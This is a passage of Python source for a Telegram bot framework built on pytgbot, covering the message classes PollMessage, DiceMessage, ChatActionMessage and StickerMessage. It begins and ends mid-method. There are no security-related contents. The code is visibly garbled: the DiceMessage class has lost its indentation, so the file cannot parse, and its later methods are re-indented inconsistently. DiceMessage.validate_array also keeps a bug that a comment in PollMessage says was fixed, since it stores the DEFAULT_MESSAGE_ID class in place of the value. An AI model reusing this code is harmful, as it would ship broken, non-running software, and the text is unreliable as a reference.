        array['question'] = u(self.question)  # py2: type unicode, py3: type str
        # NOTE(review): `_as_array` is called via PytgbotApiBot here, as in the
        # original generated code — confirm it is a static helper there.
        array['options'] = PytgbotApiBot._as_array(self.options)  # type list of str
        if self.receiver is None:
            pass  # optional: the framework fills in chat_id when sending
        elif isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if self.reply_id is None:
            pass  # optional: omitted when unset
        elif isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        if self.is_anonymous is not None:
            array['is_anonymous'] = bool(self.is_anonymous)  # type bool
        # end if
        if self.type is not None:
            array['type'] = u(self.type)  # py2: type unicode, py3: type str
        # end if
        if self.allows_multiple_answers is not None:
            array['allows_multiple_answers'] = bool(self.allows_multiple_answers)  # type bool
        # end if
        if self.correct_option_id is not None:
            array['correct_option_id'] = int(self.correct_option_id)  # type int
        # end if
        if self.explanation is not None:
            array['explanation'] = u(self.explanation)  # py2: type unicode, py3: type str
        # end if
        if self.explanation_parse_mode is not None:
            array['explanation_parse_mode'] = u(self.explanation_parse_mode)  # py2: type unicode, py3: type str
        # end if
        if self.explanation_entities is not None:
            array['explanation_entities'] = PytgbotApiBot._as_array(self.explanation_entities)  # type list of MessageEntity
        # end if
        if self.open_period is not None:
            array['open_period'] = int(self.open_period)  # type int
        # end if
        if self.close_date is not None:
            array['close_date'] = int(self.close_date)  # type int
        # end if
        if self.is_closed is not None:
            array['is_closed'] = bool(self.is_closed)  # type bool
        # end if
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        if self.reply_markup is None:
            pass  # optional: omitted when unset
        elif isinstance(self.reply_markup, InlineKeyboardMarkup):
            array['reply_markup'] = self.reply_markup.to_array()  # type InlineKeyboardMarkup
        elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
            array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardMarkup
        elif isinstance(self.reply_markup, ReplyKeyboardRemove):
            array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardRemove
        elif isinstance(self.reply_markup, ForceReply):
            array['reply_markup'] = self.reply_markup.to_array()  # type ForceReply
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the PollMessage constructor.

        :param array: serialized representation, as produced by `to_array()`.
        :type  array: dict

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        data = super(PollMessage, PollMessage).validate_array(array)
        data['question'] = u(array.get('question'))
        data['options'] = TgBotApiObject._builtin_from_array_list(required_type=unicode_type, value=array.get('options'), list_level=1)
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            # Bug fix: keep the actual sentinel *value*; the previous code
            # assigned the DEFAULT_MESSAGE_ID class itself, losing the id.
            data['reply_id'] = array.get('reply_to_message_id')
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        data['is_anonymous'] = bool(array.get('is_anonymous')) if array.get('is_anonymous') is not None else None
        data['type'] = u(array.get('type')) if array.get('type') is not None else None
        data['allows_multiple_answers'] = bool(array.get('allows_multiple_answers')) if array.get('allows_multiple_answers') is not None else None
        data['correct_option_id'] = int(array.get('correct_option_id')) if array.get('correct_option_id') is not None else None
        data['explanation'] = u(array.get('explanation')) if array.get('explanation') is not None else None
        data['explanation_parse_mode'] = u(array.get('explanation_parse_mode')) if array.get('explanation_parse_mode') is not None else None
        data['explanation_entities'] = MessageEntity.from_array_list(array.get('explanation_entities'), list_level=1) if array.get('explanation_entities') is not None else None
        data['open_period'] = int(array.get('open_period')) if array.get('open_period') is not None else None
        data['close_date'] = int(array.get('close_date')) if array.get('close_date') is not None else None
        data['is_closed'] = bool(array.get('is_closed')) if array.get('is_closed') is not None else None
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        if array.get('reply_markup') is None:
            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new PollMessage from a given dictionary.

        :return: new PollMessage instance, or None for empty input.
        :rtype: PollMessage | None
        """
        if not array:  # None or {}
            return None
        # end if
        data = PollMessage.validate_array(array)
        return PollMessage(**data)
    # end def from_array

    def __str__(self):
        """
        Implements `str(pollmessage_instance)`
        """
        return "PollMessage(question={self.question!r}, options={self.options!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, is_anonymous={self.is_anonymous!r}, type={self.type!r}, allows_multiple_answers={self.allows_multiple_answers!r}, correct_option_id={self.correct_option_id!r}, explanation={self.explanation!r}, explanation_parse_mode={self.explanation_parse_mode!r}, explanation_entities={self.explanation_entities!r}, open_period={self.open_period!r}, close_date={self.close_date!r}, is_closed={self.is_closed!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(pollmessage_instance)`
        """
        return "PollMessage(question={self.question!r}, options={self.options!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, is_anonymous={self.is_anonymous!r}, type={self.type!r}, allows_multiple_answers={self.allows_multiple_answers!r}, correct_option_id={self.correct_option_id!r}, explanation={self.explanation!r}, explanation_parse_mode={self.explanation_parse_mode!r}, explanation_entities={self.explanation_entities!r}, open_period={self.open_period!r}, close_date={self.close_date!r}, is_closed={self.is_closed!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in pollmessage_instance`
        """
        return (
            key in ["question", "options", "receiver", "reply_id", "is_anonymous", "type", "allows_multiple_answers", "correct_option_id", "explanation", "explanation_parse_mode", "explanation_entities", "open_period", "close_date", "is_closed", "disable_notification", "allow_sending_without_reply", "reply_markup"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class PollMessage
class DiceMessage(ReturnableMessageBase):
"""
Use this method to send an animated emoji that will display a random value. On success, the sent Message is returned.
https://core.telegram.org/bots/api#senddice
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param emoji: Emoji on which the dice throw animation is based. Currently, must be one of "🎲", "🎯", "🏀", "⚽", "🎳", or "🎰". Dice can have values 1-6 for "🎲", "🎯" and "🎳", values 1-5 for "🏀" and "⚽", and values 1-64 for "🎰". Defaults to "🎲"
:type emoji: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, receiver=None, reply_id=DEFAULT_MESSAGE_ID, emoji=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send an animated emoji that will display a random value. On success, the sent Message is returned.
https://core.telegram.org/bots/api#senddice
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param emoji: Emoji on which the dice throw animation is based. Currently, must be one of "🎲", "🎯", "🏀", "⚽", "🎳", or "🎰". Dice can have values 1-6 for "🎲", "🎯" and "🎳", values 1-5 for "🏀" and "⚽", and values 1-64 for "🎰". Defaults to "🎲"
:type emoji: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(DiceMessage, self).__init__()
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(emoji, None, unicode_type, parameter_name="emoji")
self.emoji = emoji
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_dice(
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
emoji=self.emoji,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this DiceMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(DiceMessage, self).to_array()
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['emoji'] = u(self.emoji) # py2: type unicode, py3: type str
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the DiceMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(DiceMessage, DiceMessage).validate_array(array)
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['emoji'] = u(array.get('emoji')) if array.get('emoji') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
    """
    Deserialize a new DiceMessage from a given dictionary.

    :param array: the dictionary to deserialize; may be None or empty.
    :type  array: dict | None

    :return: new DiceMessage instance, or None for empty input.
    :rtype: DiceMessage | None
    """
    if array:
        return DiceMessage(**DiceMessage.validate_array(array))
    # end if
    return None  # given None or {}
# end def from_array
def __str__(self):
    """
    Implements `str(dicemessage_instance)`.
    """
    # f-string pieces are concatenated adjacently; output is identical to the
    # single .format() template this replaces.
    return (
        f"DiceMessage(receiver={self.receiver!r}, reply_id={self.reply_id!r}, "
        f"emoji={self.emoji!r}, disable_notification={self.disable_notification!r}, "
        f"allow_sending_without_reply={self.allow_sending_without_reply!r}, "
        f"reply_markup={self.reply_markup!r})"
    )
# end def __str__
def __repr__(self):
    """
    Implements `repr(dicemessage_instance)`.
    """
    # Same textual representation as __str__, kept as a separate definition
    # to match the surrounding generated classes.
    return (
        f"DiceMessage(receiver={self.receiver!r}, reply_id={self.reply_id!r}, "
        f"emoji={self.emoji!r}, disable_notification={self.disable_notification!r}, "
        f"allow_sending_without_reply={self.allow_sending_without_reply!r}, "
        f"reply_markup={self.reply_markup!r})"
    )
# end def __repr__
def __contains__(self, key):
    """
    Implements `"key" in dicemessage_instance`.

    A key counts as contained only if it is a known field name, the attribute
    exists, and its value is truthy.
    """
    known_fields = (
        "receiver", "reply_id", "emoji",
        "disable_notification", "allow_sending_without_reply", "reply_markup",
    )
    if key not in known_fields:
        return False
    # end if
    return hasattr(self, key) and bool(getattr(self, key, None))
# end def __contains__
# end class DiceMessage
class ChatActionMessage(ReturnableMessageBase):
    """
    Use this method when you need to tell the user that something is happening on the bot's side. The status is set for 5 seconds or less (when a message arrives from your bot, Telegram clients clear its typing status). Returns True on success.
    Example: The ImageBot needs some time to process a request and upload the image. Instead of sending a text message along the lines of "Retrieving image, please wait…", the bot may use sendChatAction with action = upload_photo. The user will see a "sending photo" status for the bot.
    We only recommend using this method when a response from the bot will take a noticeable amount of time to arrive.

    https://core.telegram.org/bots/api#sendchataction

    Parameters:

    :param action: Type of action to broadcast. Choose one, depending on what the user is about to receive: typing for text messages, upload_photo for photos, record_video or upload_video for videos, record_voice or upload_voice for voice notes, upload_document for general files, choose_sticker for stickers, find_location for location data, record_video_note or upload_video_note for video notes.
    :type action: str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type receiver: str|unicode | int
    """

    def __init__(self, action, receiver=None):
        """
        Use this method when you need to tell the user that something is happening on the bot's side. The status is set for 5 seconds or less (when a message arrives from your bot, Telegram clients clear its typing status). Returns True on success.

        https://core.telegram.org/bots/api#sendchataction

        Parameters:

        :param action: Type of action to broadcast. Choose one, depending on what the user is about to receive: typing for text messages, upload_photo for photos, record_video or upload_video for videos, record_voice or upload_voice for voice notes, upload_document for general files, choose_sticker for stickers, find_location for location data, record_video_note or upload_video_note for video notes.
        :type action: str|unicode

        Optional keyword parameters:

        :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
        :type receiver: str|unicode | int
        """
        super(ChatActionMessage, self).__init__()
        assert_type_or_raise(action, unicode_type, parameter_name="action")
        self.action = action
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        # sendChatAction has no reply_to parameter, so ignore_reply is not used here.
        return sender.send_chat_action(
            action=self.action,
            chat_id=self.receiver,
        )
    # end def actual_send

    def to_array(self):
        """
        Serializes this ChatActionMessage to a dictionary.

        :return: dictionary representation of this object.
        :rtype: dict
        """
        array = super(ChatActionMessage, self).to_array()
        array['action'] = u(self.action)  # py2: type unicode, py3: type str
        if self.receiver is None:
            # BUGFIX: receiver=None is explicitly allowed by __init__ and produced by
            # validate_array, but this branch used to raise TypeError. Omit chat_id
            # entirely so the framework's automatic receiver can be used.
            pass
        elif isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the ChatActionMessage constructor.

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        data = super(ChatActionMessage, ChatActionMessage).validate_array(array)
        data['action'] = u(array.get('action'))
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new ChatActionMessage from a given dictionary.

        :return: new ChatActionMessage instance, or None if the input was None or empty.
        :rtype: ChatActionMessage | None
        """
        if not array:  # None or {}
            return None
        # end if
        data = ChatActionMessage.validate_array(array)
        return ChatActionMessage(**data)
    # end def from_array

    def __str__(self):
        """
        Implements `str(chatactionmessage_instance)`
        """
        return "ChatActionMessage(action={self.action!r}, receiver={self.receiver!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(chatactionmessage_instance)`
        """
        return "ChatActionMessage(action={self.action!r}, receiver={self.receiver!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in chatactionmessage_instance`
        """
        return (
            key in ["action", "receiver"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class ChatActionMessage
class StickerMessage(ReturnableMessageBase):
    """
    Use this method to send static .WEBP or animated .TGS stickers. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendsticker

    Parameters:

    :param sticker: Sticker to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a .WEBP file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
    :type sticker: pytgbot.api_types.sendable.files.InputFile | str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type reply_id: DEFAULT_MESSAGE_ID | int

    :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
    :type disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type allow_sending_without_reply: bool

    :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
    :type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """

    def __init__(self, sticker, receiver=None, reply_id=DEFAULT_MESSAGE_ID, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Use this method to send static .WEBP or animated .TGS stickers. On success, the sent Message is returned.

        https://core.telegram.org/bots/api#sendsticker

        Parameters:

        :param sticker: Sticker to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a .WEBP file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
        :type sticker: pytgbot.api_types.sendable.files.InputFile | str|unicode

        Optional keyword parameters:

        :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
        :type receiver: str|unicode | int

        :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
        :type reply_id: DEFAULT_MESSAGE_ID | int

        :param disable_notification: Sends the message silently. Users will receive a notification with no sound.
        :type disable_notification: bool

        :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
        :type allow_sending_without_reply: bool

        :param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
        :type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
        """
        super(StickerMessage, self).__init__()
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        assert_type_or_raise(sticker, InputFile, unicode_type, parameter_name="sticker")
        self.sticker = sticker
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        return sender.send_sticker(
            sticker=self.sticker,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def actual_send

    def to_array(self):
        """
        Serializes this StickerMessage to a dictionary.

        Optional fields that are None are omitted from the result, matching
        what validate_array() accepts on the way back in.

        :return: dictionary representation of this object.
        :rtype: dict
        """
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        array = super(StickerMessage, self).to_array()
        if isinstance(self.sticker, InputFile):
            array['sticker'] = self.sticker.to_array()  # type InputFile
        elif isinstance(self.sticker, str):
            array['sticker'] = u(self.sticker)  # py2: type unicode, py3: type str
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        if self.receiver is None:
            # BUGFIX: receiver=None is allowed by __init__ but used to raise here;
            # omit chat_id so the framework's automatic receiver applies.
            pass
        elif isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if self.reply_id is None:
            # BUGFIX: reply_id=None is allowed by __init__ but used to raise here.
            pass
        elif isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        # BUGFIX: previously bool(None) silently became False here, which did not
        # round-trip through validate_array (it keeps None). Only emit set flags.
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        if self.reply_markup is None:
            # BUGFIX: reply_markup defaults to None in __init__ but used to raise here.
            pass
        elif isinstance(self.reply_markup, InlineKeyboardMarkup):
            array['reply_markup'] = self.reply_markup.to_array()  # type InlineKeyboardMarkup
        elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
            array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardMarkup
        elif isinstance(self.reply_markup, ReplyKeyboardRemove):
            array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardRemove
        elif isinstance(self.reply_markup, ForceReply):
